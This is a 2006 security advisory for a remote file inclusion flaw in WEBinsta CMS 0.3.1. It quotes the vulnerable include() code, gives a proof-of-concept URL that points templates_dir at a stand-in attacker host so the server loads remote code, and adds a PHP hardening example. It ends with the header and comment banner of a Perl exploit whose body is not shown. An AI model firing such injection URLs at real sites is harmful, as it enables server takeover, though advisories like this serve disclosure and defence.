ECHO_ADV_45$2006

-----------------------------------------------------------------------------------------
[ECHO_ADV_45$2006] WEBinsta CMS 0.3.1 (templates_dir) Remote File Inclusion Vulnerability
-----------------------------------------------------------------------------------------

Author : M.Hasran Addahroni
Date : Aug, 12th 2006
Location : Australia, Sydney
Web : http://advisories.echo.or.id/adv/adv45-K-159-2006.txt
Critical Lvl : Dangerous
---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : WEBinsta CMS
version : 0.3.1
URL : http://www.webinsta.com/
https://sourceforge.net/projects/webinsta/
http://atomo64.puffinhost.com/page/webinsta_cms.html
Description :

WEBinsta CMS provides a dynamic website building solution for small businesses and
individuals who want to make their web presence felt. It provides a powerful
system for people who don't know anything about HTML or PHP.
WEBinsta CMS is no longer supported by the Webinsta Team; atomo64 is now
the only active developer and he is going to continue its development.
The new CMS name is InWeb CMS.

---------------------------------------------------------------------------

Proof of Concept:
~~~~~~~~~~~~~~~
Vulnerable Script: index.php

---------------index.php--------------------------------
...
$tp_main=new bTemplate();
$tp_temp=new bTemplate();

include("code/processmods.php");
/*Read the block definition and the number*/
include($templates_dir."template.def.php");
/*administration panel and editing settings */
$show_edit=false;
...
------------------------------------------------------------------

The variable $templates_dir is not properly sanitized before it is passed to include().
When register_globals=on and allow_url_fopen=on, an attacker can
exploit this vulnerability with a simple PHP injection script.

Poc/Exploit:
~~~~~~~~~~~

http://www.target.com/[webinstacms_path]/index.php?templates_dir=http://attacker.com/evil?

Solution:
~~~~~~~~

use the latest version
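
Where upgrading is not immediately possible, the include in index.php can be hardened as sketched below. This is an added example, not WEBinsta code and not part of the original advisory; the function name resolve_templates_dir, the temporary directory layout and the sample inputs are assumptions made for illustration.

```php
<?php
// Added example, not WEBinsta code. The function name, directory layout and
// sample inputs below are constructed for illustration.

/**
 * Map a template name to a directory under $root.
 * Returns the directory with a trailing separator, or null when rejected.
 */
function resolve_templates_dir(string $root, string $name): ?string
{
    // Plain directory names only: no URL scheme, no slashes, no dots.
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $name)) {
        return null;
    }
    $base = realpath($root);
    $dir  = realpath($root . DIRECTORY_SEPARATOR . $name);
    if ($base === false || $dir === false || !is_dir($dir)) {
        return null;
    }
    // Containment check after symlinks are resolved.
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($dir, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    // The file that index.php includes must exist locally.
    return is_file($dir . DIRECTORY_SEPARATOR . 'template.def.php')
        ? $dir . DIRECTORY_SEPARATOR
        : null;
}

// Constructed fixture: a temporary template root with one valid template.
$root = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'tpl_demo_' . getmypid();
@mkdir($root . '/default', 0700, true);
file_put_contents($root . '/default/template.def.php', "<?php /* block defs */\n");

// Constructed inputs: a valid name, the advisory's URL, and a traversal.
foreach (['default', 'http://attacker.com/evil?', '../code'] as $candidate) {
    $resolved = resolve_templates_dir($root, $candidate);
    printf("%-28s => %s\n", $candidate, $resolved ?? 'REJECTED');
}

// In index.php the variable is assigned unconditionally before the include,
// so a value injected through register_globals is overwritten.
$templates_dir = resolve_templates_dir($root, 'default');
if ($templates_dir === null) {
    exit("Template configuration error\n");
}
include $templates_dir . 'template.def.php';
```

Setting register_globals=off in php.ini removes the injection path for the request parameter independently of the code change.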

Notification:
~~~~~~~~~~~

vendor not contacted yet

---------------------------------------------------------------------------
Shoutz:
~~~~~~
~ ping - my dearest wife, for all the luv the tears n the breath
~ y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,negative,kaiten
~ masterpop3,maSter-oP,Lieur-Euy,Mr_ny3m,bithedz,murp,an0maly,fleanux,baylaw
~ SinChan,x`shell,tety,sakitjiwa, m_beben, rizal, cR4SH3R, metalsploit, x16
~ newbie_hacker@yahoogroups.com
~ #aikmel #e-c-h-o @irc.dal.net

---------------------------------------------------------------------------
Contact:
~~~~~~~

K-159 || echo|staff || eufrato[at]gmail[dot]com
Homepage: http://k-159.echo.or.id/

-------------------------------- [ EOF ] ----------------------------------

Perl Exploit:
~~~~~~~~~~~

#!/usr/bin/perl
##
# WEBinsta CMS 0.3.1 (templates_dir) Remote File Inclusion Exploit
# Bug Found & code By K-159
##
# echo.or.id (c) 2006
#
##
# usage:
# perl WEBinsta.pl